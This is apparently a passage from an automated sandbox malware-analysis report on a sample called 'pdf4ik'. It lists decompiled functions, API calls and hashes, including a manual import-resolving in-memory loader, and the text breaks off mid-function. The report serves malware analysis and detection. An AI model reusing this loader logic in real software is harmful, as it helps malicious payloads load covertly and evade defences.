                                        • Opcode Fuzzy Hash: 1f2cd741bd46edb0a6568c0afb66886be392defd6ca10b09adeab8ecf3879691
                                        • Instruction Fuzzy Hash: CE31C8769112159BD715EF40DC50EEAB3BAFF84359F04809EE909A3600D7346A86DFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA3D50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65commemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 23%
                                        			E29DA3D50(intOrPtr* __esi, intOrPtr _a4) {
				void* _v8;
				char _v12;
				intOrPtr _v16;
				char* _t16;
				intOrPtr* _t18;
				void* _t21;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr* _t32;
				char* _t37;
				intOrPtr* _t39;

				_t16 =  &_v8;
				_t29 = 0;
				_v8 = 0;
				__imp__CoCreateInstance(0x29dc57a0, 0, 1, 0x29dd09a4, _t16);
				if(_t16 >= 0) {
					__imp__#2(_a4);
					_v16 = _t16;
					if(_t16 != 0) {
						_t32 = _v8;
						_t21 =  *((intOrPtr*)( *((intOrPtr*)( *_t32 + 0x20))))(_t32, _t16);
						_t39 = __imp__#6;
						if(_t21 >= 0) {
							_t24 = _v8;
							_t37 =  &_v12;
							_push(_t37);
							_push(0xffffffff);
							_push(_t24);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t24 + 0xb4))))() >= 0) {
								_t27 = E29DAFC37(_v12);
								 *((intOrPtr*)(__esi + 4)) = _t37;
								 *__esi = _t27;
								_t29 = 1;
								 *_t39(_v12);
							}
						}
						 *_t39(_v16);
					}
					_t18 = _v8;
					 *((intOrPtr*)( *((intOrPtr*)( *_t18 + 8))))(_t18);
				}
				return _t29;
			}















                                        0x29da3d58
                                        0x29da3d63
                                        0x29da3d6b
                                        0x29da3d6e
                                        0x29da3d76
                                        0x29da3d7c
                                        0x29da3d82
                                        0x29da3d87
                                        0x29da3d89
                                        0x29da3d93
                                        0x29da3d95
                                        0x29da3d9d
                                        0x29da3d9f
                                        0x29da3da4
                                        0x29da3da7
                                        0x29da3da8
                                        0x29da3daa
                                        0x29da3db5
                                        0x29da3dbb
                                        0x29da3dc0
                                        0x29da3dca
                                        0x29da3dcc
                                        0x29da3dce
                                        0x29da3dce
                                        0x29da3db5
                                        0x29da3dd4
                                        0x29da3dd4
                                        0x29da3dd6
                                        0x29da3ddf
                                        0x29da3ddf
                                        0x29da3de8

                                        APIs
                                        • CoCreateInstance.OLE32(29DC57A0,00000000,00000001,29DD09A4,?,00000010,00000000,?,29DA3F26,?), ref: 29DA3D6E
                                        • SysAllocString.OLEAUT32(29DA3F26), ref: 29DA3D7C
                                        • SysFreeString.OLEAUT32(?), ref: 29DA3DD4
                                          • Part of subcall function 29DAFC37: __wcstoi64.LIBCMT ref: 29DAFC43
                                        • SysFreeString.OLEAUT32(29DA3F26), ref: 29DA3DCE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$Free$AllocCreateInstance__wcstoi64
                                        • String ID: )
                                        • API String ID: 3478848241-2427484129
                                        • Opcode ID: 67e5570bc264c46d5cbfcc6f2c9cdae178a802e89db6c0724706efadfcd14368
                                        • Instruction ID: 70d63b6225e7428f07f39ffa5331b43704f04b2c6dca5122c7ba8c8383b6ad03
                                        • Opcode Fuzzy Hash: 67e5570bc264c46d5cbfcc6f2c9cdae178a802e89db6c0724706efadfcd14368
                                        • Instruction Fuzzy Hash: 0E1160B5700209FFDB00EFA9CC84D9AF7B9AF88244B1086ACE615D7240D635EE01DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D98890 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 82%
                                        			E29D98890(void* __edi, intOrPtr _a4) {
				char _v8;
				char _v16;
				char* _v20;
				char _v32;
				void* __ebx;
				void* __esi;
				signed int _t20;
				void* _t37;
				intOrPtr _t39;
				signed int _t41;

				_t37 = __edi;
				_push(0xffffffff);
				_push(E29DC1BE4);
				_push( *[fs:0x0]);
				_t20 =  *0x29dd5664; // 0xd9555f04
				_push(_t20 ^ _t41);
				 *[fs:0x0] =  &_v16;
				_t39 = _a4;
				E29DADA5D(_t39, 0);
				_v8 = 0;
				 *((intOrPtr*)(_t39 + 4)) = 0;
				 *((char*)(_t39 + 8)) = 0;
				 *((intOrPtr*)(_t39 + 0xc)) = 0;
				 *((char*)(_t39 + 0x10)) = 0;
				 *((intOrPtr*)(_t39 + 0x14)) = 0;
				 *((char*)(_t39 + 0x18)) = 0;
				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
				 *((char*)(_t39 + 0x20)) = 0;
				_v8 = 4;
				_t45 = __edi;
				if(__edi == 0) {
					_v20 = "bad locale name";
					E29DAE0FC( &_v32,  &_v20);
					_v32 = 0x29dc5260;
					E29DAFF06( &_v32, 0x29dd2060);
				}
				E29DAD884(0, _t37, _t39, _t45, _t39, _t37);
				 *[fs:0x0] = _v16;
				return _t39;
			}













                                        0x29d98890
                                        0x29d98893
                                        0x29d98895
                                        0x29d988a0
                                        0x29d988a6
                                        0x29d988ad
                                        0x29d988b1
                                        0x29d988b7
                                        0x29d988bf
                                        0x29d988c4
                                        0x29d988c7
                                        0x29d988ca
                                        0x29d988cd
                                        0x29d988d0
                                        0x29d988d3
                                        0x29d988d6
                                        0x29d988d9
                                        0x29d988dc
                                        0x29d988df
                                        0x29d988e3
                                        0x29d988e5
                                        0x29d988ee
                                        0x29d988f5
                                        0x29d98903
                                        0x29d9890a
                                        0x29d9890a
                                        0x29d98911
                                        0x29d9891e
                                        0x29d9892b

                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29D988BF
                                        • std::exception::exception.LIBCMT ref: 29D988F5
                                          • Part of subcall function 29DAE0FC: std::exception::_Copy_str.LIBCMT ref: 29DAE117
                                        • __CxxThrowException@8.LIBCMT ref: 29D9890A
                                          • Part of subcall function 29DAFF06: RaiseException.KERNEL32(29D89803,00000001,D9555F04,29DC52AC,29D89803,00000001,29DD2028,29D851F1,D9555F04), ref: 29DAFF48
                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 29D98911
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                                        • String ID: bad locale name
                                        • API String ID: 73090415-1405518554
                                        • Opcode ID: 6e45f4de8a61a09199530ca72865051260c65d2fb036add3490884fd73d07996
                                        • Instruction ID: 6b245b2a63bccee8a62885d9c3d8c54294eba48391119fcf1d963c9b86368ebd
                                        • Opcode Fuzzy Hash: 6e45f4de8a61a09199530ca72865051260c65d2fb036add3490884fd73d07996
                                        • Instruction Fuzzy Hash: 071182B2804648AFC711DF998880A9FFBF8FB29610F80866ED55593A40D7346605DBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DB277A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 30%
                                        			E29DB277A(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E29DB26E8(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E29DB03AA(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E29DB2159(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_t14 = _t22 + 0xc; // 0x6e
				_push(_t27);
				_push(_a4);
				_t20 = E29DB23CD(_t22,  *_t14, _t25, _t26, _t27, _t31);
				if(_t20 != 0) {
					E29DB0371(_t20, _t27);
					return _t20;
				}
				return _t20;
			}











                                        0x29db277a
                                        0x29db277a
                                        0x29db277a
                                        0x29db277a
                                        0x29db277a
                                        0x29db277f
                                        0x29db2783
                                        0x29db2785
                                        0x29db2788
                                        0x29db2789
                                        0x29db278a
                                        0x29db278d
                                        0x29db2792
                                        0x29db2792
                                        0x29db2795
                                        0x29db2799
                                        0x29db279c
                                        0x29db27a1
                                        0x29db279e
                                        0x29db279e
                                        0x29db279e
                                        0x29db27a4
                                        0x29db27a9
                                        0x29db27ab
                                        0x29db27ae
                                        0x29db27b1
                                        0x29db27b2
                                        0x29db27ba
                                        0x29db27bf
                                        0x29db27c3
                                        0x29db27c6
                                        0x29db27c9
                                        0x29db27cc
                                        0x29db27cf
                                        0x29db27d0
                                        0x29db27d3
                                        0x29db27dd
                                        0x29db27e1
                                        0x00000000
                                        0x29db27e1
                                        0x29db27e7

                                        APIs
                                        • ___BuildCatchObject.LIBCMT ref: 29DB278D
                                          • Part of subcall function 29DB26E8: ___BuildCatchObjectHelper.LIBCMT ref: 29DB271E
                                        • _UnwindNestedFrames.LIBCMT ref: 29DB27A4
                                        • ___FrameUnwindToState.LIBCMT ref: 29DB27B2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                        • String ID: csm$csm
                                        • API String ID: 2163707966-3733052814
                                        • Opcode ID: d9ab484e12d52535e9e60eae61805b5416c87f709676d90ae6157c4ff97f398b
                                        • Instruction ID: 0408cdcc56ca8db536a32bf4d19468ef523f3b326df658e9d9c3a6ab23eac8b4
                                        • Opcode Fuzzy Hash: d9ab484e12d52535e9e60eae61805b5416c87f709676d90ae6157c4ff97f398b
                                        • Instruction Fuzzy Hash: F501FB77001109BFDF125F91CC94F9A7F6AFF28394F108018BE1929520D7329572EBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA46C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 75%
                                        			E29DA46C0(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t12;
				void* _t18;
				void* _t21;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				void* _t27;

				_t24 = E29DADFE0(_t18, __edi, _t23, __ebx);
				 *_t24 = 0;
				E29DAFCE4(GetTickCount());
				_t27 = _t25 + 8;
				_t29 = __ebx;
				if(__ebx <= 0) {
					 *((char*)(0 + _t24)) = 0;
					return _t24;
				} else {
					_push(__edi);
					_t21 = __ebx;
					do {
						_t12 = E29DAFCF6(_t29);
						asm("cdq");
						_push(_t12 % 0xa);
						_push(_t24);
						wsprintfA(_t24, "%s%d");
						_t27 = _t27 + 0x10;
						_t21 = _t21 - 1;
					} while (_t21 != 0);
					 *((char*)(__ebx + _t24)) = 0;
					return _t24;
				}
			}











                                        0x29da46c7
                                        0x29da46cc
                                        0x29da46d6
                                        0x29da46db
                                        0x29da46e0
                                        0x29da46e2
                                        0x29da4711
                                        0x29da4717
                                        0x29da46e4
                                        0x29da46e4
                                        0x29da46e5
                                        0x29da46e7
                                        0x29da46e7
                                        0x29da46ec
                                        0x29da46f4
                                        0x29da46f5
                                        0x29da46fc
                                        0x29da4702
                                        0x29da4705
                                        0x29da4705
                                        0x29da4709
                                        0x29da4710
                                        0x29da4710

                                        APIs
                                        • _malloc.LIBCMT ref: 29DA46C2
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29DA46CF
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29DA46E7
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29DA46FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __getptd$AllocateCountHeapTick_malloc_randwsprintf
                                        • String ID: %s%d
                                        • API String ID: 2840978672-1110647743
                                        • Opcode ID: 1d24f62f307d17e38deac55572f953c38d576b5cf6ebf1b0a63e7d4b35bc5f40
                                        • Instruction ID: 06a41907442a77253975f2161c45cbcf5dad0deb531b83560ff95e2cbd269138
                                        • Opcode Fuzzy Hash: 1d24f62f307d17e38deac55572f953c38d576b5cf6ebf1b0a63e7d4b35bc5f40
                                        • Instruction Fuzzy Hash: 08F0EC536012D12BE7112A7D6C85B8B69588FA1150F5844BEF849C7602DD6CDC52A3F2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D84B60 Relevance: 7.6, APIs: 5, Instructions: 135libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 98%
                                        			E29D84B60(void* __edi) {
				intOrPtr* _v8;
				struct HINSTANCE__* _v12;
				intOrPtr _v16;
				void* __esi;
				intOrPtr _t37;
				intOrPtr _t39;
				signed int _t42;
				intOrPtr _t44;
				signed short _t45;
				CHAR* _t46;
				_Unknown_base(*)()* _t47;
				signed int _t49;
				intOrPtr* _t59;
				signed short* _t61;
				intOrPtr _t64;
				intOrPtr* _t69;
				struct HINSTANCE__* _t73;
				void* _t76;
				signed short* _t77;
				intOrPtr _t79;
				void* _t85;
				void* _t86;
				void* _t87;

				_t76 = __edi;
				_t37 =  *((intOrPtr*)(__edi + 0xc0));
				_t86 = _t85 - 0xc;
				if(_t37 == 0 ||  *((intOrPtr*)(__edi + 0xc4)) == 0) {
					return 0;
				} else {
					_t59 =  *((intOrPtr*)(__edi + 0x144)) + _t37;
					_t39 =  *((intOrPtr*)(_t59 + 0xc));
					_push(_t77);
					_v8 = _t59;
					if(_t39 != 0) {
						while(1) {
							_t73 = LoadLibraryA( *((intOrPtr*)(_t76 + 0x144)) + _t39);
							_v12 = _t73;
							if(_t73 == 0) {
								break;
							}
							_t42 =  *(_t76 + 0x154);
							if( *(_t76 + 0x150) < _t42) {
								_t79 = _v16;
								goto L15;
							} else {
								if(_t42 == 0) {
									_t49 = 0x10;
								} else {
									_t49 = _t42 + _t42;
								}
								 *(_t76 + 0x154) = _t49;
								_t79 = E29DADFE0(_t49 * 4, _t76, _t77, _t49 * 4);
								_t87 = _t86 + 4;
								_v16 = _t79;
								if(_t79 == 0) {
									return 3;
								} else {
									_t52 =  *(_t76 + 0x150);
									if( *(_t76 + 0x150) != 0) {
										E29DB0010(_t79,  *((intOrPtr*)(_t76 + 0x14c)), _t52 + _t52 + _t52 + _t52);
										_t87 = _t87 + 0xc;
									}
									E29DADFA6( *((intOrPtr*)(_t76 + 0x14c)));
									_t73 = _v12;
									_t86 = _t87 + 4;
									 *((intOrPtr*)(_t76 + 0x14c)) = _t79;
									L15:
									_t69 = _v8;
									 *(_t79 +  *(_t76 + 0x150) * 4) = _t73;
									 *(_t76 + 0x150) =  *(_t76 + 0x150) + 1;
									_t44 =  *((intOrPtr*)(_t76 + 0x144));
									_t77 =  *((intOrPtr*)(_t59 + 0x10)) + _t44;
									_t61 = _t77;
									if( *((intOrPtr*)(_t69 + 4)) == 0) {
										L18:
										_t45 =  *_t61;
										if(_t45 == 0) {
											L27:
											_t39 =  *((intOrPtr*)(_t69 + 0x20));
											_v8 = _t69 + 0x14;
											if(_t39 != 0) {
												_t59 = _v8;
												continue;
											} else {
												return _t39;
											}
										} else {
											L21:
											L21:
											if(_t45 >= 0) {
												_t46 = _t45 +  *((intOrPtr*)(_t76 + 0x144)) + 2;
											} else {
												_t46 = _t45 & 0x0000ffff;
											}
											_t47 = GetProcAddress(_t73, _t46);
											 *_t77 = _t47;
											if(_t47 == 0) {
												break;
											}
											_t45 = _t61[2];
											_t61 =  &(_t61[2]);
											_t77 =  &(_t77[2]);
											if(_t45 != 0) {
												_t73 = _v12;
												goto L21;
											} else {
												_t69 = _v8;
												goto L27;
											}
										}
									} else {
										_t64 =  *_t69;
										if(_t64 == 0) {
											return 8;
										} else {
											_t61 = _t64 + _t44;
											goto L18;
										}
									}
								}
							}
							goto L33;
						}
						return 6;
					} else {
						return _t39;
					}
				}
				L33:
			}


























                                        0x29d84b60
                                        0x29d84b63
                                        0x29d84b69
                                        0x29d84b6e
                                        0x29d84ce1
                                        0x29d84b81
                                        0x29d84b88
                                        0x29d84b8a
                                        0x29d84b8d
                                        0x29d84b8e
                                        0x29d84b93
                                        0x29d84ba3
                                        0x29d84bb2
                                        0x29d84bb4
                                        0x29d84bb9
                                        0x00000000
                                        0x00000000
                                        0x29d84bbf
                                        0x29d84bcb
                                        0x29d84c36
                                        0x00000000
                                        0x29d84bcd
                                        0x29d84bcf
                                        0x29d84bd5
                                        0x29d84bd1
                                        0x29d84bd1
                                        0x29d84bd1
                                        0x29d84be2
                                        0x29d84bed
                                        0x29d84bef
                                        0x29d84bf2
                                        0x29d84bf7
                                        0x29d84cc5
                                        0x29d84bfd
                                        0x29d84bfd
                                        0x29d84c05
                                        0x29d84c14
                                        0x29d84c19
                                        0x29d84c19
                                        0x29d84c23
                                        0x29d84c28
                                        0x29d84c2b
                                        0x29d84c2e
                                        0x29d84c39
                                        0x29d84c3f
                                        0x29d84c42
                                        0x29d84c45
                                        0x29d84c4e
                                        0x29d84c54
                                        0x29d84c5a
                                        0x29d84c5c
                                        0x29d84c66
                                        0x29d84c66
                                        0x29d84c6a
                                        0x29d84ca4
                                        0x29d84ca4
                                        0x29d84caa
                                        0x29d84caf
                                        0x29d84ba0
                                        0x00000000
                                        0x29d84cb5
                                        0x29d84cba
                                        0x29d84cba
                                        0x29d84c6c
                                        0x00000000
                                        0x29d84c73
                                        0x29d84c75
                                        0x29d84c82
                                        0x29d84c77
                                        0x29d84c77
                                        0x29d84c77
                                        0x29d84c88
                                        0x29d84c8e
                                        0x29d84c92
                                        0x00000000
                                        0x00000000
                                        0x29d84c94
                                        0x29d84c97
                                        0x29d84c9a
                                        0x29d84c9f
                                        0x29d84c70
                                        0x00000000
                                        0x29d84ca1
                                        0x29d84ca1
                                        0x00000000
                                        0x29d84ca1
                                        0x29d84c9f
                                        0x29d84c5e
                                        0x29d84c5e
                                        0x29d84c62
                                        0x29d84cd0
                                        0x29d84c64
                                        0x29d84c64
                                        0x00000000
                                        0x29d84c64
                                        0x29d84c62
                                        0x29d84c5c
                                        0x29d84bf7
                                        0x00000000
                                        0x29d84bcb
                                        0x29d84cdb
                                        0x29d84b95
                                        0x29d84b9a
                                        0x29d84b9a
                                        0x29d84b93
                                        0x00000000

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc_free_malloc_memmove
                                        • String ID:
                                        • API String ID: 2200627730-0
                                        • Opcode ID: f7c01d0856f4ef7a66c74bab585721b27d9f770cb8cb1b8fde786551f84ba76a
                                        • Instruction ID: c6821c851a3761640ac4e9ec43f1bec4b9a4814317685b570462bdc9e22d99ca
                                        • Opcode Fuzzy Hash: f7c01d0856f4ef7a66c74bab585721b27d9f770cb8cb1b8fde786551f84ba76a
                                        • Instruction Fuzzy Hash: E2411E71B01606ABD708CEA9D984BA5F3A8BF48355F0441ADDD0CDB706E735F922AB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DAC210 Relevance: 7.6, APIs: 5, Instructions: 121timeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 91%
                                        			E29DAC210(void* __ebx, void* __ecx, intOrPtr _a4) {
				signed int _v12;
				struct _SYSTEMTIME _v28;
				signed int _v32;
				signed int _v36;
				struct _FILETIME _v44;
				void* _v48;
				void* __edi;
				void* __esi;
				signed int _t45;
				long _t48;
				intOrPtr _t52;
				intOrPtr _t58;
				long _t73;
				long _t83;
				void* _t87;
				void* _t89;
				signed int _t91;

				_t66 = __ebx;
				_t45 =  *0x29dd5664; // 0xd9555f04
				_v12 = _t45 ^ _t91;
				_t87 = __ecx;
				_v48 = __ecx;
				 *(__ebx + 0x7c) = 0;
				 *((intOrPtr*)(__ebx + 0x84)) = 0;
				 *((char*)(__ebx + 0x80)) = 0;
				 *((intOrPtr*)(__ebx + 0x78)) = 0;
				 *((intOrPtr*)(__ebx + 0x70)) = 0;
				 *((intOrPtr*)(__ebx + 0x90)) = 0;
				 *((intOrPtr*)(__ebx + 0x74)) = 0;
				if(__ecx == 0 || __ecx == 0xffffffff) {
					_t48 = 0x10000;
					goto L9;
				} else {
					if(SetFilePointer( *(__ebx + 4), 0, 0, 1) == 0xffffffff) {
						_t52 = _a4;
						 *((intOrPtr*)(__ebx + 0x4c)) = 0x80000000;
						 *((intOrPtr*)(__ebx + 0x70)) = 0xffffffff;
						if(_t52 != 0) {
							 *((intOrPtr*)(__ebx + 0x70)) = _t52;
						}
						 *((char*)(_t66 + 0x6c)) = 0;
						GetLocalTime( &_v28);
						SystemTimeToFileTime( &_v28,  &_v44);
						_t83 = _v44.dwLowDateTime;
						E29DABC00( &_v32,  &_v36, _t83);
						asm("sbb ecx, 0x19db1de");
						_t58 = E29DB75A0(_v44.dwLowDateTime - 0xd53e8000, _v44.dwHighDateTime, 0x989680, 0);
						_t73 = _t83;
						 *(_t66 + 0x54) = _t83;
						 *((intOrPtr*)(_t66 + 0x50)) = _t58;
						 *((intOrPtr*)(_t66 + 0x58)) = _t58;
						 *((intOrPtr*)(_t66 + 0x60)) = _t58;
						 *(_t66 + 0x5c) = _t73;
						 *(_t66 + 0x64) = _t73;
						 *(_t66 + 0x68) = (_v36 & 0x0000ffff) << 0x00000010 | _v32 & 0x0000ffff;
						 *((intOrPtr*)(_t66 + 0x7c)) = _v48;
						return E29DADF46(0, _t66, _v12 ^ _t91, (_v36 & 0x0000ffff) << 0x00000010 | _v32 & 0x0000ffff,  &_v32,  &_v36, _v44.dwHighDateTime);
					} else {
						_t81 = __ebx + 0x68;
						_t48 = E29DABC70(__ebx + 0x70, __ebx + 0x68, _t87, __ebx + 0x4c, __ebx + 0x50);
						if(_t48 != 0) {
							L9:
							return E29DADF46(_t48, _t66, _v12 ^ _t91, _t81, _t87, _t89);
						} else {
							SetFilePointer(_t87, _t48, _t48, _t48);
							 *((char*)(__ebx + 0x6c)) = 1;
							 *(__ebx + 0x7c) = _t87;
							return E29DADF46(0, __ebx, _v12 ^ _t91, _t81, _t87, _t89);
						}
					}
				}
			}




















                                        0x29dac210
                                        0x29dac216
                                        0x29dac21d
                                        0x29dac224
                                        0x29dac226
                                        0x29dac229
                                        0x29dac22c
                                        0x29dac232
                                        0x29dac238
                                        0x29dac23b
                                        0x29dac23e
                                        0x29dac244
                                        0x29dac249
                                        0x29dac356
                                        0x00000000
                                        0x29dac258
                                        0x29dac269
                                        0x29dac2af
                                        0x29dac2b2
                                        0x29dac2b9
                                        0x29dac2c2
                                        0x29dac2c4
                                        0x29dac2c4
                                        0x29dac2cb
                                        0x29dac2cf
                                        0x29dac2dd
                                        0x29dac2e6
                                        0x29dac2f1
                                        0x29dac30b
                                        0x29dac313
                                        0x29dac318
                                        0x29dac31a
                                        0x29dac321
                                        0x29dac324
                                        0x29dac327
                                        0x29dac331
                                        0x29dac334
                                        0x29dac33c
                                        0x29dac33f
                                        0x29dac353
                                        0x29dac26b
                                        0x29dac273
                                        0x29dac27a
                                        0x29dac284
                                        0x29dac35b
                                        0x29dac36a
                                        0x29dac28a
                                        0x29dac28e
                                        0x29dac294
                                        0x29dac298
                                        0x29dac2ac
                                        0x29dac2ac
                                        0x29dac284
                                        0x29dac269

                                        APIs
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,29D8F602,?,?,?,?,?,?,?,29DAC973,?,?,?), ref: 29DAC260
                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,29DAC973,?), ref: 29DAC28E
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,29DAC973,?,?,?), ref: 29DAC2CF
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,29DAC973,?,?,?), ref: 29DAC2DD
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29DAC313
                                          • Part of subcall function 29DABC70: GetFileInformationByHandle.KERNEL32(?,?,?,?,?), ref: 29DABC9A
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Time$Pointer$HandleInformationLocalSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 89576305-0
                                        • Opcode ID: 0305df31fcd6b18acafbe5e59c64af31b70ca02ba55ddf3e6afc4e07c1809ba1
                                        • Instruction ID: 8b15310a354d521f776d6242e2e49331013db74e66432815a2cd91f5c7aaa965
                                        • Opcode Fuzzy Hash: 0305df31fcd6b18acafbe5e59c64af31b70ca02ba55ddf3e6afc4e07c1809ba1
                                        • Instruction Fuzzy Hash: 3E4133B29002449FCB44DF79D880AAA7BF9EF58310F0081AEED15DB246EB349555DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D84B9B Relevance: 7.6, APIs: 5, Instructions: 88libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29D84B9B(intOrPtr __eax, void* __edi, signed short* __esi) {
				intOrPtr _t32;
				signed int _t35;
				intOrPtr _t37;
				signed short _t38;
				CHAR* _t39;
				_Unknown_base(*)()* _t40;
				signed int _t42;
				intOrPtr _t50;
				signed short* _t52;
				intOrPtr _t54;
				intOrPtr* _t59;
				struct HINSTANCE__* _t63;
				void* _t66;
				signed short* _t67;
				intOrPtr _t69;
				void* _t74;
				void* _t79;
				void* _t81;

				_t67 = __esi;
				_t66 = __edi;
				_t32 = __eax;
				while(1) {
					_t50 =  *((intOrPtr*)(_t74 - 4));
					_t63 = LoadLibraryA( *((intOrPtr*)(_t66 + 0x144)) + _t32);
					 *(_t74 - 8) = _t63;
					if(_t63 == 0) {
						break;
					}
					_t35 =  *(_t66 + 0x154);
					if( *(_t66 + 0x150) < _t35) {
						_t69 =  *((intOrPtr*)(_t74 - 0xc));
						goto L12;
					} else {
						if(_t35 == 0) {
							_t42 = 0x10;
						} else {
							_t42 = _t35 + _t35;
						}
						 *(_t66 + 0x154) = _t42;
						_t69 = E29DADFE0(_t42 * 4, _t66, _t67, _t42 * 4);
						_t81 = _t79 + 4;
						 *((intOrPtr*)(_t74 - 0xc)) = _t69;
						if(_t69 == 0) {
							return 3;
						} else {
							_t45 =  *(_t66 + 0x150);
							if( *(_t66 + 0x150) != 0) {
								E29DB0010(_t69,  *((intOrPtr*)(_t66 + 0x14c)), _t45 + _t45 + _t45 + _t45);
								_t81 = _t81 + 0xc;
							}
							E29DADFA6( *((intOrPtr*)(_t66 + 0x14c)));
							_t63 =  *(_t74 - 8);
							_t79 = _t81 + 4;
							 *((intOrPtr*)(_t66 + 0x14c)) = _t69;
							L12:
							_t59 =  *((intOrPtr*)(_t74 - 4));
							 *(_t69 +  *(_t66 + 0x150) * 4) = _t63;
							 *(_t66 + 0x150) =  *(_t66 + 0x150) + 1;
							_t37 =  *((intOrPtr*)(_t66 + 0x144));
							_t67 =  *((intOrPtr*)(_t50 + 0x10)) + _t37;
							_t52 = _t67;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								L15:
								_t38 =  *_t52;
								if(_t38 == 0) {
									L24:
									_t32 =  *((intOrPtr*)(_t59 + 0x20));
									 *((intOrPtr*)(_t74 - 4)) = _t59 + 0x14;
									if(_t32 != 0) {
										continue;
									} else {
										return _t32;
									}
								} else {
